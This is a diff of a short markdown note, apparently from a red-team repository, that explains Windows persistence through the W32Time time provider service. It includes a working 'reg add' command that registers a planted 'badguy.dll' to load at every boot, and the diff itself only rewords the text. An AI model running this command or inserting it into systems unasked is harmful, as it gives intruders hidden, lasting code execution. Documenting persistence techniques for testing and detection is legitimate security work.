Iandmee/P3rs1f1l3/Windows_Persistence_addons.md

 ## Time providers

  Time providers are implemented in the form of a DLL file which resides in System32 folder.
-The service **W32Time** initiates during the startup of Windows and loads the w32time.dll.Since the associated service is starting automatically during the startup of Windows it can be used as a persistence mechanism.
+The service **W32Time** initiates during the startup of Windows and loads the w32time.dll.
+Since the associated service is starting automatically during Windows startup, it can be used as a persistence mechanism.

 ```powershell
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\path\to\badguy.dll"
 ```

-Add *badguy.dll* in *W32Time* Timeprovider service.
-NtpClient starts with system for synsynchronizing time and also your *dll* with it.
+Add *badguy.dll* to *W32Time* Timeprovider service.
+NtpClient starts with system for time synsynchronization and will execute your *dll*.

 *refer: https://pentestlab.blog/2019/10/22/persistence-time-providers/*